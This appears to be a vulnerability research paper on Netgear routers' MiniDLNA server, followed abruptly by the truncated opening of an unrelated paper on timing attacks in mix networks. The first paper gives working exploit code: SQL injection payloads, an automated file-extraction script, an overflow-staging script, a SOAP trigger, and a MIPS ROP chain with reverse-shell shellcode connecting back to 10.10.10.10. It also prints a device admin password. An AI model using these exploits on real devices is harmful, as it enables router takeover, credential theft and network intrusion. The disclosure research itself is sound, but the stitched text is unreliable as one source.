The SOHO router, as a class of device, is generally inexpensive and sees little direct user interaction. It functions discreetly and reliably on a shelf and is often forgotten past its initial setup and configuration. However, the significance of this device's role on the network cannot be overstated. As a gateway device, it is often entrusted with all of its users' Internet-bound traffic. The vulnerabilities I discuss in this paper offer an attacker a privileged vantage point on a home or corporate network. A compromise of such a device can grant to the attacker access to all of a network's inbound and outbound communication. Further, successful compromise of the gateway device opens the opportunity to attack internal systems that previously were not exposed.
Analyzing the Target Device

Inspection of the target device's firmware is an excellent place to begin analysis. There is a wealth of intelligence to be found in the manufacturer's firmware update file. Although the process of unpacking and analyzing firmware is beyond the scope of this paper, Craig Heffner has provided on his website[2] an excellent explanation of the tools and techniques involved. Having downloaded[3] and unpacked the firmware update file, we can now verify that this device runs a Linux-based operating system:

[1] At the time of writing, this device is widely available online for approximately USD$100.
[2] http://www.devttys0.com/2011/05/reverse-engineering-firmware-linksys-wag120n/
[3] http://support.netgear.com/app/products/model/a_id/19278
Figure 1 Verifying the Linux kernel in the vendor’s firmware update file.
Any device that runs Linux is an ideal candidate for analysis, since there are ample tools and techniques readily available for working with Linux systems. Often, simply having a copy of the firmware is sufficient for discovering vulnerabilities and developing working exploits against them. However, being able to interact directly with the hardware can aid analysis greatly. In the case of the WNDR3700, it is easy to modify its internals by attaching a UART header so we can interact with the running device via a serial console application such as minicom. I won't detail the specifics of hardware modification in this paper. This is adequately addressed on various hobbyist websites and forums. However, terminal access to the device is essential for the investigations I describe.

In addition to the serial port, the WNDR3700v3 has another feature that aids analysis: a USB port. This device is intended for use as a Network Attached Storage (NAS) device, and will automatically mount a USB storage device when it is plugged in. This makes it easy to load tools onto the device for dynamic analysis. Also, system files such as executables, libraries, configuration files, and database files may be copied from the device for offline analysis.

Although the DLNA server functionality requires external USB storage in order to serve digital media, the vulnerabilities detailed in this paper do not. The vulnerable DLNA server functionality remains running on the device even if the user does not connect a USB storage device.
Target Application: MiniDLNA server

The application included in the WNDR3700's firmware providing DLNA capabilities is called 'minidlna.exe'. The minidlna executable can be found in the unpacked firmware:
Figure 2 Locating minidlna.exe in unpacked firmware.
Running the 'strings' command on the minidlna.exe executable, grepping for 'Version', reveals that this build is version 1.0.18:
Figure 3 Verifying version of MiniDLNA found in vendor’s firmware update file.
A Google search reveals that Netgear has released MiniDLNA as an open source project on Sourceforge.com. This is potentially a lucky find. Source code significantly reduces the time and effort involved in analyzing the target application.
Analyzing MiniDLNA

Vulnerability 1: SQL Injection

Having downloaded and unpacked the corresponding source code for MiniDLNA version 1.0.18, there are easy indicators to look for which may point to vulnerabilities. A grep search yields valuable evidence:
Figure 4 A search for candidates for SQL injection vulnerability.
Looking for potential SQL injections, we grep for SQL queries constructed using improperly escaped strings (the '%s' format character). There are 21 lines matching this pattern in the MiniDLNA source. The ones shown above are representative. In addition to being potential SQL injections, there are also possible buffer overflows, due to the use of an unbounded sprintf(). Let's look at upnphttp.c, line 1174, where ALBUM_ART is queried:
Figure 5 Location in MiniDLNA source code where album art is queried by ID field.
We see that 'sql_buf' is a 256-byte character array placed on the stack. There is an unbounded sprintf() into it. This may be a buffer overflow. A grep through the source reveals there's only a single call-site for SendResp_albumArt(). Let's look at where it's called in upnphttp.c:
Figure 6 Analyzing call-site of SendResp_albumArt(). This appears to be no buffer overflow candidate, but may be a
SQL injection candidate.
We can see the caller, ProcessHttpQuery_unpnphttp(), sends a string 512 (or fewer) bytes in length to SendResp_albumArt(). Unfortunately, since there is a 1500-byte character array on the stack in SendResp_albumArt() above sql_buf, we cannot overwrite the saved return address with an overflow. Nonetheless, this seems to be an ideal candidate for SQL injection. If there is a dash character in the requested 'object', the dash and everything after is trimmed. What remains of the 'object' string is transformed into a SQL query.

It isn't safe to assume that the source code Netgear posted to SourceForge matches the shipping binary perfectly. A quick look in IDA Pro at the minidlna.exe executable copied from the target system can verify that the same bug exists on the shipping device.
Figure 7 Verifying the presence of a SQL injection bug in the shipping executable.
We can copy the SQLite database from the running device to analyze its contents and schema.
Figure 8 Verifying the schema of the ALBUM_ART table.
The schema defines the ALBUM_ART table as a primary key and a text field called 'PATH'. If the SQL injection works, we should be able to forge an ALBUM_ART record by inserting bogus integer and string values into that table. Analysis of the source code shows that the DLNA client device retrieves album art from the HTTP URL path '/AlbumArt/', followed by the unique ID of the album art's database entry. We can verify this with a web browser:
Figure 9 Verifying album art HTTP URL in a web browser.
We can easily test our SQL injection vulnerability using the wget command, and then retrieve the database from the running device for analysis. We must make sure the GET request isn't truncated or tokenized as a result of spaces in the injected SQL command. It is important for the complete SQL syntax to arrive intact and be interpreted correctly by SQLite. This is easily resolved: SQLite allows the use of C-style comments to separate keywords, which we can substitute for spaces:

INSERT/**/into/**/ALBUM_ART(ID,PATH)/**/VALUES('31337','pwned');
Before testing this injection, it is worth noting that plugging in a FAT-formatted USB disk causes MiniDLNA to create the SQLite database on the disk, rather than on the target's temporary file system. Later, we will see a way to extract the database from the running system over the network, but for now, we will ensure a USB disk is plugged in, so we can power off the device, connect the disk to our own system, and analyze the resulting database offline. Append the injected command after the requested album's unique ID:
Figure 10 A trivially exploitable SQL injection vulnerability.
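The same request can also be issued programmatically. The following is a minimal sketch along the lines of the helper in Appendix A; it assumes the target's MiniDLNA instance answers on 10.10.10.1, port 8200, as in the appendices:

#!/usr/bin/env python
# Minimal sketch of the ALBUM_ART SQL injection request.
# Assumes MiniDLNA is reachable at 10.10.10.1:8200, as in the appendices.
import httplib

host = "10.10.10.1"
port = 8200

# C-style comments stand in for spaces so the GET request arrives intact.
query = 'INSERT/**/into/**/ALBUM_ART(ID,PATH)/**/VALUES("31337","pwned");'
request = "/AlbumArt/1;" + query + "-18.jpg"

conn = httplib.HTTPConnection(host, port)
conn.request("GET", request, "", {"Host": host})
print conn.getresponse().status
conn.close()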
The good news is we have a working, trivially exploitable SQL injection! We have created an ALBUM_ART record consisting of 31337 and 'pwned'. The bad news is this exploit, on its own, is of little value. This database contains metadata about the user's music and videos, but no real sensitive or valuable information. In fact, if the database is destroyed, it is regenerated the next time MiniDLNA indexes the user's media files. No valuable information can be compromised from this exploit alone.
What we will look at next is how the MiniDLNA application uses the results of its database queries. We will see how assumptions about the integrity of query results create the opportunity for more significant security vulnerabilities.
Vulnerability 2: Arbitrary File Extraction

By analyzing the contents of MiniDLNA's populated database...
Figure 11 Analyzing the PATH field of an ALBUM_ART record.
...as well as the source code for the SendResp_albumArt() function...
Figure 12 The SendResp_albumArt() function appears to send any file on the system that the query result points to.
...we can make an interesting observation. It appears MiniDLNA serves up whatever file is pointed to by the PATH value from the query result.
What makes this even more interesting is that MiniDLNA, like all processes on the device, is running as the root user. It is not prevented from accessing any arbitrary file from the system. We can verify this by injecting the following query:

INSERT/**/into/**/ALBUM_ART(ID,PATH)/**/VALUES('31337','/etc/passwd');

We test this with wget:
Figure 13 A SQL injection allows us to wget arbitrary files via HTTP.
With that, we have vulnerability number two: arbitrary file extraction! We have used the original SQL injection from before in order to exploit a second vulnerability: the MiniDLNA application fails to sanitize the 'path' result from its album art database query.

This is a useful attack against the device. First, the passwd file seen in the above example contains the password for the 'admin' user account. The Samba file sharing service creates this file whenever the user connects a USB storage device, even though the user has not enabled sharing on the WNDR3700's configuration page. Further, the device does not support creation of accounts and passwords for file sharing that are separate from the system configuration account. The password shown above, 'qw12QW!@', enables complete access to the device's configuration web interface.
Secondly, the ability to quickly and easily extract arbitrary files from the running system makes analysis easier during the development of our next exploit. We can even use SQL injection to retrieve the database file from the live system. This will make it more convenient to analyze the results of our various SQL injections. Appendix A contains a program that automates this exploit.
Vulnerability 3: Remote Code Execution

Arbitrary file extraction yields greater access than before, but ideally we will find a way to execute arbitrary code, hopefully enabling fully privileged system access. The most likely attack vector is a buffer overflow. With luck we can find an unbounded write to a buffer declared on the stack. We start our quest for overflow candidates by searching for low hanging fruit. A grep through the source code for dangerous string-handling functions is a good place to begin.
Figure 14 A search through MiniDLNA’s source code for dangerous string functions yields many candidates.
Searching for strcat(), sprintf(), and strcpy() function calls returns 265 lines. It looks like there are plenty of opportunities to overflow a buffer. Let's have a look at upnpsoap.c, line 846:
Figure 15 A buffer overflow candidate in MiniDLNA’s SQLite callback() function.
This is an intriguing bug for a couple of reasons. First, this sprintf() is near the end of an exceptionally long function. That is important because there are many function arguments and local variables on the stack. If an overflow overwrites the stack too early in the function, there are many hazards that would likely crash the program before we successfully intercept the function's return. This bug is also interesting because callback() is the function passed to sqlite3_exec() to process the query results. As seen at line 956 of upnpsoap.c, the query whose results are sent to callback() is:
Figure 16 The SQL query whose results are processed by MiniDLNA’s callback() function.
Let’s
look
at
the
schema
for
the
DETAILS
table.
Figure 17 The schema of the DETAILS table. ALBUM_ART is an integer.
The schema shows that ALBUM_ART is an integer, but the sprintf() in question is writing the returned album art ID into the 512-byte str_buf as a string. A couple things are worth noting. First, SQLite uses "type affinity"[4] to convert a string to a field's numeric type. It does this only if the string has a numeric representation. For example, the string "1234" will be stored as the integer 1,234 in an integer field, but "1234WXYZ" will be stored as a string. Further, SQLite returns results from queries on integer fields as strings. Second, the program attempts to "validate" the string returned by SQLite using the atoi() function. However, this test only verifies that at least the first character of the string is a number and, more specifically, a number other than zero. The rest of the string, starting with the first non-number, is ignored.[5]
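To see why this validation is so permissive, consider the following sketch (our own illustration, not MiniDLNA code) of atoi()'s behavior:

# Illustration of why an atoi()-style check passes arbitrary strings
# that merely begin with a nonzero digit.
def atoi(s):
    # Emulates C atoi(): parse leading decimal digits, ignore the rest.
    i = 0
    while i < len(s) and s[i].isdigit():
        i += 1
    return int(s[:i]) if i > 0 else 0

print atoi("1234")         # 1234: stored as an integer by SQLite
print atoi("1234WXYZ")     # 1234: the "validation" passes; tail ignored
print atoi("1" + "A"*600)  # 1:    a long overflow string also passes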
The implication is that arbitrary data may be returned from the SQL query and subsequently written into str_buf, even though ALBUM_ART is specified as an integer in the database's schema. Perhaps the developer assumes album_art will be a string representation of an integer, and therefore of limited length. Next, by violating this assumption, we will have an exploitable buffer overflow.

Ordinarily this particular bug is difficult or impossible to exploit, as its input comes from a database, not from user input or a network connection. There is no reason that the database, which is not user facing, should contain anything that the application didn't put there itself. Fortunately for us, we have previously discovered a trivially exploitable SQL injection that gives us unfettered access to the database. Thus, we can put anything there we want.

To be sure this bug is present in the shipping executable, we can go back to IDA Pro for a quick look inside the callback() function.

[4] http://www.sqlite.org/faq.html#q3
[5] http://kernel.org/doc/man-pages/online/pages/man3/atoi.3.html
Figure 18 Verifying the presence of the buffer overflow candidate in the shipping minidlna.exe executable.
Disassembly in IDA suggests that the target's copy of MiniDLNA is vulnerable to an ALBUM_ART buffer overflow. In order to verify exploitability we need to have data that we control loaded into the CPU's program counter. We can test this by first staging records in the OBJECTS and DETAILS tables that will satisfy the left join query described earlier. Then we will stage a sufficiently long string in the database to overflow the buffer and overwrite the function's saved return address. We can set up the appropriate records with the following SQL commands:

INSERT/**/into/**/DETAILS(ID,SIZE,TITLE,ARTIST,ALBUM,TRACK,DLNA_PN,MIME,ALBUM_ART,DISC)
/**/VALUES("31337","PWNED","PWNED","PWNED","PWNED","PWNED","PWNED","PWNED","1","PWNED");

INSERT/**/into/**/OBJECTS(OBJECT_ID,PARENT_ID,CLASS,DETAIL_ID)/**/
VALUES("PWNED","PWNED","container","31337");
This will create two records that are related via a DETAILS.ID and OBJECTS.DETAIL_ID of '31337'. It is also important to note that the OBJECTS.ID value is 'PWNED' and that the ALBUM_ART value is 1. When constructing the string value in DETAILS.ALBUM_ART, we ensure it passes the atoi() check by starting it with the character '1'.

We need to build up a long string in our record's ALBUM_ART field of the DETAILS table. Recall that we will be exploiting the SendResp_albumArt() function, and the string passed into it is not arbitrarily long. In fact, it is just over 500 bytes at most. The 'object' string consists of the requested object path, e.g., '/AlbumArt/1-18.jpg', plus the overhead of the injected SQL syntax. Further, the SQL query gets written into a buffer that is 256 (Listing 4) bytes in size, even though the 'object' string can be as long as 500 bytes. This clearly is a bug, but it's not the bug we're attempting to exploit. It is a good idea to keep the value that we're injecting into the ALBUM_ART field to a safe length of 128 bytes.

How can we overflow a buffer 512 bytes in length by enough excess to successfully overwrite the return address saved at the top of the stack frame? Using SQLite's concatenation operator, '||', we can build the excessively long string in multiple SQL injection passes, and keep appending more data to the previous. For example:

UPDATE/**/DETAILS/**/set/**/ALBUM_ART=ALBUM_ART||"AAAA"/**/where/**/ID="3";
Appendix B is a listing of a Python script that will insert our long test string into the target's database. In order to trigger the buffer overflow, the client must send a proper SOAP request to MiniDLNA such that staged database records are queried and the results processed by the vulnerable callback() function.
Appendix C is a listing of a Python script that will generate a complete DLNA discovery and conversation. We can use it to isolate the key SOAP request between client and server using Wireshark and capture it for playback.
Figure 19 Isolating the SOAP request that causes our staged record to be queried.
Appendix D lists the SOAP request XML document that will query the 'PWNED' object ID, thus triggering the exploit. Having staged the buffer overflow in the database, we can trigger it by sending the captured SOAP request using the following wget command:
$ wget http://10.10.10.1:8200/ctl/ContentDir --header="Host: 10.10.10.1" \
--header=\
'SOAPACTION: "urn:schemas-upnp-org:service:ContentDirectory:1#Browse"' \
--header='"content-type: text/xml ;charset="utf-8"' \
--header="connection: close" --post-file=./soaprequest.xml
Using a USB disk, we can load a gdbserver cross-compiled[6] for little endian MIPS onto the live device and attach to the running minidlna.exe process. In order to remotely debug we will need to use a gdb compiled for our own machine's host architecture and the little endian MIPS target architecture. When sending the SOAP request, we can see gdb catch the crash and that our data lands in the program counter:
Figure 20 Crashing minidlna.exe with control of the PC register and all S registers.
We now have control of the program counter, and by extension, the program's flow of execution. Further, we have control over all of the S-registers! This makes things easier as we develop our exploit. We overflowed the target buffer with approximately 640 bytes of data. If we rerun the program with a much larger overflow, say over 2500 bytes, we will be able to see how much of the stack we can control.

[6] Cross-compilation is beyond the scope of this paper and is left as an exercise for the reader.
We are able to view the state of the stack at the time of the crash in gdb. The figure below shows that we can control an arbitrary amount of the stack space. Our longer overflow string does not appear to get truncated. This gives plenty of room to build a ROP[7] chain and to stage a payload. We can use the ROP exploitation technique to locate a stack address and return into our code there. A working exploit buffer is provided in Appendix E. It includes a reverse TCP connect-back shell that connects back to the IP address 10.10.10.10, port 31337.

[7] Return Oriented Programming, ROP, is an exploitation technique by which the attacker causes the compromised program to execute existing instructions that are part of the program or its libraries, rather than executing buffer overflow data directly. http://cseweb.ucsd.edu/~hovav/talks/blackhat08.html
Figure 21 A view of the stack after overflowing the buffer. We can put a large amount of user-controlled data on the
stack.
Affected Devices

In researching these vulnerabilities, I obtained and analyzed the firmware for several different Netgear SOHO routers. For each router I analyzed the two most recent firmware update files available on the vendor's support website. I focused only on devices that provided the DLNA capability. Although the WNDR3700v3 is the only device for which I developed and tested the exploits, all the devices and firmware versions I analyzed appear to be vulnerable based on disassembly and static analysis. The following table describes the devices and their respective firmware versions that appear to be vulnerable.
Router Model   Firmware Version   MiniDLNA Version   Performed Static Analysis   Vulnerable   Developed Exploits
WNDR3700v3     1.0.0.18           1.0.18             Yes                         Yes          Yes
               1.0.0.22           1.0.18             Yes                         Yes
WNDR3800       1.0.0.18           1.0.19             Yes                         Yes
               1.0.0.24           1.0.19             Yes [8]                     Yes
WNDR4000       1.0.0.82           1.0.18             Yes                         Yes
               1.0.0.88           1.0.18             Yes                         Yes
WNDR4500       1.0.0.70           1.0.18             Yes                         Yes
               1.0.1.6            1.0.18             Yes                         Yes
In total, I found eight separate firmware versions across four separate device models that contain the vulnerable executable.
Conclusion

As we have seen, there are a number of readily exploitable vulnerabilities in Netgear's MiniDLNA server and Netgear's wireless routers. It is easy to pass over an attack that yields little direct value, such as the SQL injection shown earlier. However, I have clearly shown two practical and useful attacks that become possible when combined with the first. Just as significantly, I have presented analysis techniques that can be applied to a variety of embedded devices for vulnerability research and exploit development.

The first known hostile exploitation of a buffer overflow was by the Morris worm in 1988.[9] Yet, twenty-four years later, buffer overflows continue to be as important as ever. Moreover, oft-overlooked embedded devices such as SOHO routers are among the most critical systems on users' networks. Vulnerabilities found within, such as those I have described in this paper, have the potential to expose a great many users to exploitation.

[8] The MD5 digest for the minidlna executable unpacked from WNDR3800 firmware version 1.0.0.24 matches the digest from firmware 1.0.0.18, so no additional static analysis is required.
[9] http://web.archive.org/web/20070520233435/http://world.std.com/~franl/worm.html
Appendix A
The following program exploits a SQL injection vulnerability to enable convenient file extraction from the target. It may be invoked as follows:

$ ./albumartinject.py '/etc/passwd'

An HTTP URL is then displayed for use with the wget command.
#!/usr/bin/env python
import os
import sys
import urllib,socket,os,httplib
import time

headers={"Host":"10.10.10.1"}
host="10.10.10.1"
album_art_path='/AlbumArt'
inject_id="31337"
port=8200
path_beginning=album_art_path+'/1;'
path_ending='-18.jpg'

class Logging:
    WARN=0
    INFO=1
    DEBUG=2
    log_level=2
    prefixes=[]
    prefixes.append(" [!] ")
    prefixes.append(" [+] ")
    prefixes.append(" [@] ")

    @classmethod
    def log_msg(klass,msg,level=INFO):
        if klass.log_level>=level:
            pref=Logging.prefixes[level]
            print pref+msg

def log(msg):
    Logging.log_msg(msg)

def log_debug(msg):
    Logging.log_msg(msg,Logging.DEBUG)

def log_warn(msg):
    Logging.log_msg(msg,Logging.WARN)

def usage():
    usage="Usage: %s [FILE]\nInject a database record allowing HTTP access to FILE.\n" % \
        os.path.basename(sys.argv[0])
    print usage

def build_request(query):
    request=path_beginning+query+path_ending
    return request

def do_request(request):
    log_debug("Requesting:")
    log_debug(request)
    conn=httplib.HTTPConnection(host,port)
    conn.request("GET",request,"",headers)
    resp=conn.getresponse()
    data=resp.read()
    conn.close()
    return data

try:
    desired_file=sys.argv[1]
except IndexError:
    usage()
    exit(1)
log("Requested file is: "+desired_file)
albumart_insert_query='insert/**/into/**/ALBUM_ART(ID,PATH)'+\
'/**/VALUES("'+inject_id+'","'+desired_file+'");'
albumart_delete_query='delete/**/from/**/ALBUM_ART/**/where/**/ID="'+inject_id+'";'
log("Deleting old record.")
request=build_request(albumart_delete_query)
resp=do_request(request)
log_debug(resp)
log("Injecting ALBUM_ART record.")
request=build_request(albumart_insert_query)
resp=do_request(request)
log_debug(resp)
log("Injection complete.")
log("You may access "+desired_file)
log("via the URL http://%s:%d%s/%s-18.jpg"%(host,port,album_art_path,inject_id))
Appendix B
#!/usr/bin/env python
# AAAAinject.py
# Author: Zachary Cutlip
# [email protected]
# twitter: @zcutlip
# This script injects a buffer overflow into the ALBUM_ART table of
# MiniDLNA's SQLite database. When queried with the proper SOAP request,
# this buffer overflow demonstrates arbitrary code execution by placing a
# string of user-controlled 'A's in the CPU's program counter. This
# affects MiniDLNA version 1.0.18 as shipped with Netgear WNDR3700 version 3.
import math
import sys
import urllib,socket,os,httplib
import time
from overflow_data import DlnaOverflowBuilder

headers={"Host":"10.10.10.1"}
host="10.10.10.1"
COUNT=8
LEN=128
empty=''

overflow_strings=[]
overflow_strings.append("AA")
overflow_strings.append("A"*LEN)
overflow_strings.append("B"*LEN)
overflow_strings.append("C"*LEN)
overflow_strings.append("D"*LEN)
overflow_strings.append("A"*LEN)
overflow_strings.append("\x10\x21\x76\x15"*(LEN/4))
overflow_strings.append("\x10\x21\x76\x15"*(LEN/4))
overflow_strings.append("D"*LEN)
overflow_strings.append("D"*LEN)
overflow_strings.append("D"*LEN)

path_beginning='/AlbumArt/1;'
path_ending='-18.jpg'

details_insert_query='insert/**/into/**/DETAILS(ID,SIZE,TITLE,ARTIST,ALBUM'+\
    ',TRACK,DLNA_PN,MIME,ALBUM_ART,DISC)/**/VALUES("31337"'+\
    ',"PWNED","PWNED","PWNED","PWNED","PWNED","PWNED"'+\
    ',"PWNED","1","PWNED");'
objects_insert_query='insert/**/into/**/OBJECTS(OBJECT_ID,PARENT_ID,CLASS,DETAIL_ID)'+\
    '/**/VALUES("PWNED","PWNED","container","31337");'
details_delete_query='delete/**/from/**/DETAILS/**/where/**/ID="31337";'
objects_delete_query='delete/**/from/**/OBJECTS/**/where/**/OBJECT_ID="PWNED";'

def build_injection_req(query):
    request=path_beginning+query+path_ending
    return request

def do_get_request(request):
    conn=httplib.HTTPConnection(host,8200)
    conn.request("GET",request,"",headers)
    conn.close()

def build_update_query(string):
    details_update_query='update/**/DETAILS/**/set/**/ALBUM_ART=ALBUM_ART'+\
        '||"'+string+'"/**/where/**/ID="31337";'
    return details_update_query

def clear_overflow_data():
    print "Deleting existing overflow data..."
    request=build_injection_req(details_delete_query)
    do_get_request(request)
    request=build_injection_req(objects_delete_query)
    do_get_request(request)
    time.sleep(1)
def insert_overflow_data():
    print("Setting up initial database records....")
    request=build_injection_req(objects_insert_query)
    do_get_request(request)
    request=build_injection_req(details_insert_query)
    do_get_request(request)
    print("Building long ALBUM_ART string.")
    for string in overflow_strings:
        req=build_injection_req(build_update_query(string))
        do_get_request(req)

clear_overflow_data()
insert_overflow_data()
Appendix C
#!/usr/bin/env python
# dlnaclient.py
# A program to browse the content directory for a specific object.
# Use it to analyze the DLNA conversation in order to identify the
# appropriate SOAP request to query the desired object.
# Author: Zachary Cutlip
# [email protected]
# Twitter: @zcutlip
from twisted.internet import reactor
from coherence.base import Coherence
from coherence.upnp.devices.control_point import ControlPoint
from coherence.upnp.core import DIDLLite

# called for each media server found
def media_server_found(client, udn):
    print "media_server_found", client
    d = client.content_directory.browse('PWNED',
        browse_flag='BrowseDirectChildren', requested_count=100,
        process_result=False, backward_compatibility=False)

def media_server_removed(udn):
    print "media_server_removed", udn

def start():
    control_point = ControlPoint(Coherence({'logmode':'warning'}),
        auto_client=['MediaServer'])
    control_point.connect(media_server_found,
        'Coherence.UPnP.ControlPoint.MediaServer.detected')
    control_point.connect(media_server_removed,
        'Coherence.UPnP.ControlPoint.MediaServer.removed')

if __name__ == "__main__":
    reactor.callWhenRunning(start)
    reactor.run()
Appendix D
soaprequest.xml:
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body>
<ns0:Browse xmlns:ns0="urn:schemas-upnp-org:service:ContentDirectory:1">
<ObjectID>PWNED</ObjectID>
<BrowseFlag>BrowseDirectChildren</BrowseFlag>
<Filter>*</Filter>
<StartingIndex>0</StartingIndex>
<RequestedCount>100</RequestedCount>
<SortCriteria />
</ns0:Browse>
</s:Body>
</s:Envelope>
Appendix E
# exploitbuffer.py
# Author: Zachary Cutlip
# [email protected]
# Twitter: @zcutlip
# An exploit buffer and reverse TCP connect-back payload
# targeting the vulnerable callback() function in
# MiniDLNA version 1.0.18 as shipped with Netgear WNDR3700 version 3.
# Connect-back IP address: 10.10.10.10
# Port: 31337

class DlnaOverflowBuilder:
    MIPSNOPSTRING="\x27\x70\xc0\x01"*8
    pattern128_1="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8"+\
        "Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae"
    pattern128_2="2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1"+\
        "Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4A"
    pattern128_3="i5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4"+\
        "Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7"
    pattern128_4="Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao"+\
        "7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar"
    pattern40_5="0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3"
    pattern8_6="As4A6As7"
    pattern16_7="0At1At2At3At4At5"
    pattern28_8="t7At8At9Au0Au1Au2Au3Au4Au5Au"
    pattern32_9="8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7"
    pattern64_10="o9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar"
    pattern40_11="2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5"
    connect_back=["\xfd\xff\x0f\x24\x27",
        "x'20'", #SQL escape
        "\xe0\x01\x27\x28\xe0\x01\xff\xff\x06\x28",
        "\x57\x10\x02\x24\x0c\x01\x01\x01\xff\xff\xa2\xaf\xff\xff\xa4\x8f",
        "\xfd\xff\x0f\x24\x27\x78\xe0\x01\xe2\xff\xaf\xaf\x7a\x69\x0e\x3c",
        "\x7a\x69\xce\x35\xe4\xff\xae\xaf\x0a\x0a",
        "x'0d'", #SQL escape
        "\x3c\x0a\x0a\xad\x35",
        "\xe6\xff\xad\xaf\xe2\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01",
        "\x4a\x10\x02\x24\x0c\x01\x01\x01\xfd\xff\x0f\x24\x27\x28\xe0\x01",
        "\xff\xff\xa4\x8f\xdf\x0f\x02\x24\x0c\x01\x01\x01\xff\xff\xa5",
        "x'20'", #SQL escape
        "\xff\xff\x01\x24\xfb\xff\xa1\x14\xff\xff\x06\x28\x62\x69\x0f\x3c",
        "\x2f\x2f\xef\x35\xf4\xff\xaf\xaf\x73\x68\x0e\x3c\x6e\x2f\xce\x35",
        "\xf8\xff\xae\xaf\xfc\xff\xa0\xaf\xf4\xff\xa4\x27\xd8\xff\xa4\xaf",
        "\xff\xff\x05\x28\xdc\xff\xa5\xaf\xd8\xff\xa5\x27\xab\x0f\x02\x24",
        "\x0c\x01\x01\x01\xff\xff\x06\x28"]

    def initial_overflow(self):
        overflow_data=[]
        overflow_data.append("AA")
        overflow_data.append(self.pattern128_1)
        overflow_data.append(self.pattern128_2)
        overflow_data.append(self.pattern128_3)
        overflow_data.append(self.pattern128_4)
        overflow_data.append(self.pattern40_5)
        return overflow_data
    def rop_chain(self):
        ropchain=[]
        # jalr s6
        ropchain.append("\xac\x02\x12\x2b")
        ropchain.append(self.pattern8_6)
        # cacheflush()
        ropchain.append("\xb8\xdf\xf3\x2a")
        # jalr s0
        ropchain.append("\xc4\x41\x0e\x2b")
        ropchain.append(self.pattern16_7)
        # move t9,s3
        # jalr t9
        ropchain.append("\x08\xde\x16\x2b")
        ropchain.append(self.pattern28_8)
        # load offset from sp into S6, then jalr S1
        ropchain.append("\x30\x9d\x11\x2b")
        ropchain.append(self.pattern32_9)
        # load offset from sp into S6, then jalr S1
        ropchain.append("\x30\x9d\x11\x2b")
        ropchain.append(self.pattern64_10)
        ropchain.append("abcd")
        # avoid crashing memcpy
        ropchain.append("\x32\xc9\xa3\x15")
        ropchain.append("D"*12)
        ropchain.append("\x32\xc9\xa3\x15")
        ropchain.append(self.pattern128_1)
        ropchain.append(self.pattern40_11)
        return ropchain

    def payload(self):
        payload=[]
        for i in xrange(0,1):
            payload.append(self.MIPSNOPSTRING)
        for string in self.connect_back:
            payload.append(string)
        # for debugging purposes so we can locate our shellcode in memory
        payload.append("D"*4)
        return payload
Timing Attacks in Low-Latency Mix Systems
(Extended Abstract)
Brian N. Levine1, Michael K. Reiter2, Chenxi Wang2, and Matthew Wright1
1 University of Massachusetts, Amherst, MA, USA; {brian,mwright}@cs.umass.edu
2 Carnegie Mellon University, Pittsburgh, PA, USA; {reiter,chenxi}@cmu.edu
Abstract. A mix is a communication proxy that attempts to hide the
correspondence between its incoming and outgoing messages. Timing
attacks are a significant challenge for mix-based systems that wish to
support interactive, low-latency applications. However, the potency of
these attacks has not been studied carefully. In this paper, we investigate
timing analysis attacks on low-latency mix systems and clarify the threat
they pose. We propose a novel technique, defensive dropping, to thwart
timing attacks. Through simulations and analysis, we show that defensive
dropping can be effective against attackers who employ timing analysis.
1
Introduction
A mix [6] is a communication proxy that attempts to hide the correspondence
between its incoming and outgoing messages. Routing communication through
a chain of mixes is a powerful tool for providing unlinkability of senders and
receivers despite observation of the network by a global eavesdropper and the
corruption of many mix servers on the path. A mix can use a variety of tech-
niques for hiding the relationships between its incoming and outgoing messages.
In particular, it will typically transform them cryptographically, delay them,
reorder them, and emit additional "dummy" messages in its output. The effectiveness of these techniques has been carefully studied (e.g., [4, 12, 18, 15, 13]),
but mainly for high-latency systems, e.g., anonymous email or voting applica-
tions that do not require efficient processing. In practice, such systems may take
hours to deliver a message to its intended destination.
Users desire anonymity for more interactive applications, such as web brows-
ing, online chat, and file-sharing, all of which require a low-latency connection. A
number of low-latency mix-based protocols for unlinkable communications have
been proposed, including ISDN-Mixes [14], Onion Routing [16], Tarzan [10], Web
Mixes [3], and Freedom [2]. Unfortunately, there are a number of known attacks
on these systems that take advantage of weaknesses in mix-based protocols when
they are used for low-latency applications [19, 2, 20].
The work of Levine and Wright was supported in part by National Science Founda-
tion awards ANI-0087482 and EIA-0080199. The work of Reiter, Wang, and Wright
was supported in part by National Science Foundation award CCR-0208853 and a
grant from the Air Force F49620-01-1-0340.
The attack we consider here is timing analysis, where an attacker studies the
timings of messages moving through the system to find correlations. This kind
of analysis might make it possible for two attacker mixes (i.e., mixes owned or
compromised by the attacker) to determine that they are on the same communi-
cation path. In some systems, this allows these two attacker mixes to match the
sender with her destination. Unfortunately, it is not known precisely how vul-
